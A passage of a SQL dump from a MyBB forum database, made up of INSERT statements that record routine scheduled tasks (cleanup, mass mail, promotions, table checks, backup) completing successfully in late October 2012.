`mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12534', '9', '1351100581', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12535', '3', '1351102360', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12536', '5', '1351102412', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12537', '9', '1351102430', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12538', '1', '1351102610', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12539', '7', '1351103677', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12540', '5', '1351103683', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12541', '9', '1351104510', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12542', '3', '1351105075', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12543', '5', '1351105084', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12544', '9', '1351105123', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12545', '3', '1351105143', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12546', '1', '1351105484', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12547', '7', '1351105486', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12548', '5', '1351105503', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12549', '9', '1351105938', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12550', '5', '1351107039', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12551', '9', '1351107239', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12552', '3', '1351107242', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12553', '9', '1351107711', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12554', '5', '1351107972', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12555', '9', '1351108541', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12556', '3', '1351108911', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12557', '1', '1351109001', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12558', '7', '1351109031', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12559', '5', '1351109148', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12560', '9', '1351109553', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12561', '5', '1351110599', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12562', '9', '1351110707', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12563', '3', '1351110711', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12564', '9', '1351111220', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12565', '5', '1351111773', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12566', '9', '1351112263', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12567', '3', '1351112343', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12568', '1', '1351112678', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12569', '7', '1351112690', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12570', '5', '1351112706', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12571', '9', '1351113042', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12572', '5', '1351114935', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12573', '9', '1351114982', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12574', '3', '1351114985', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12575', '5', '1351115348', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12576', '9', '1351118016', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12577', '3', '1351118021', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12578', '1', '1351118024', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12579', '7', '1351118027', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12580', '5', '1351118032', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12581', '9', '1351118437', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12582', '5', '1351118999', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12583', '9', '1351119318', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12584', '3', '1351119614', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12585', '1', '1351119623', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12586', '7', '1351119792', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12587', '5', '1351120787', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12588', '9', '1351120807', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12589', '5', '1351121211', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12590', '9', '1351121219', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12591', '3', '1351121579', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12592', '9', '1351125004', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12593', '5', '1351125016', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12594', '3', '1351125020', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12595', '1', '1351125023', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12596', '2', '1351125036', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12597', '7', '1351125041', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12598', '11', '1351125045', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12599', '9', '1351125853', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12600', '5', '1351127812', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12601', '9', '1351127825', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12602', '3', '1351127836', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12603', '1', '1351128555', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12604', '7', '1351129504', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12605', '5', '1351129596', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12606', '9', '1351129622', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12607', '3', '1351129963', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12608', '9', '1351130132', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12609', '3', '1351130369', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12610', '1', '1351130411', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12611', '7', '1351130417', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12612', '5', '1351130745', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12613', '9', '1351131129', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12614', '5', '1351131978', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12615', '9', '1351132061', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12616', '3', '1351132266', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12617', '9', '1351132870', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12618', '5', '1351133138', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12619', '9', '1351133760', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12620', '3', '1351133962', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12621', '1', '1351134032', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12622', '7', '1351134048', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12623', '5', '1351134440', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12624', '9', '1351134668', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12625', '5', '1351135612', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12626', '9', '1351135744', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12627', '3', '1351135957', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12628', '9', '1351136469', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12629', '5', '1351136754', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12630', '9', '1351137467', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12631', '3', '1351137553', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12632', '1', '1351137602', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12633', '7', '1351137619', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12634', '5', '1351137931', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12635', '9', '1351138229', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12636', '5', '1351140759', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12637', '9', '1351140905', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12638', '3', '1351140937', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12639', '3', '1351142875', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12640', '1', '1351142926', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12641', '7', '1351142937', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12642', '5', '1351143009', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12643', '9', '1351143015', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12644', '3', '1351143124', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12645', '9', '1351143619', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12646', '5', '1351143932', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12647', '9', '1351149810', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12648', '3', '1351149817', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12649', '1', '1351151119', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12650', '7', '1351151123', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12651', '5', '1351151125', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12652', '9', '1351151148', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12653', '3', '1351151214', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12654', '9', '1351152073', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12655', '3', '1351152194', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12656', '1', '1351152201', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12657', '7', '1351152203', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12658', '5', '1351152356', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12659', '9', '1351152643', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12660', '5', '1351153725', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12661', '9', '1351153937', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12662', '3', '1351154597', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12663', '9', '1351154625', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12664', '5', '1351154705', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12665', '9', '1351155559', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12666', '3', '1351155589', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12667', '1', '1351155604', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12668', '7', '1351155612', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12669', '5', '1351155958', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12670', '9', '1351156258', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12671', '5', '1351157150', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12672', '9', '1351157161', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12673', '3', '1351157413', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12674', '9', '1351158065', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12675', '5', '1351158315', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12676', '9', '1351158997', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12677', '3', '1351159142', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12678', '1', '1351159228', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12679', '7', '1351159231', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12680', '5', '1351159544', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12681', '9', '1351159858', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12682', '5', '1351160883', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12683', '9', '1351160894', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12684', '3', '1351161173', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12685', '9', '1351162355', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12686', '5', '1351162361', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12687', '9', '1351163673', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12688', '3', '1351163680', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12689', '1', '1351164384', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12690', '7', '1351164388', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12691', '5', '1351164393', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12692', '9', '1351165383', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12693', '3', '1351165398', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12694', '5', '1351165520', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12695', '9', '1351166187', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12696', '3', '1351166353', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12697', '1', '1351166470', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12698', '4', '1351166477', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12699', '7', '1351166487', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12700', '5', '1351166749', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12701', '9', '1351167018', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12702', '5', '1351167994', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12703', '9', '1351168011', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12704', '3', '1351168693', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12705', '9', '1351169009', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12706', '5', '1351169129', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12707', '9', '1351170533', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12708', '3', '1351170541', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12709', '1', '1351170547', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12710', '7', '1351170557', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12711', '5', '1351170603', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12712', '9', '1351170982', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12713', '5', '1351171587', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12714', '9', '1351171631', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12715', '3', '1351172421', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12716', '9', '1351173733', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12717', '5', '1351173740', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12718', '3', '1351173761', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12719', '1', '1351173809', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12720', '7', '1351173816', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12721', '5', '1351173905', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12722', '9', '1351175450', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12723', '5', '1351175473', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12724', '3', '1351175507', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12725', '9', '1351176142', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12726', '5', '1351176646', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12727', '9', '1351176955', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12728', '3', '1351177762', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12729', '1', '1351178098', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12730', '7', '1351178101', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12731', '5', '1351178133', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12732', '9', '1351178142', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12733', '5', '1351178898', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12734', '9', '1351178938', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12735', '3', '1351179036', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12736', '9', '1351180246', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12737', '5', '1351182442', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12738', '9', '1351182468', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, 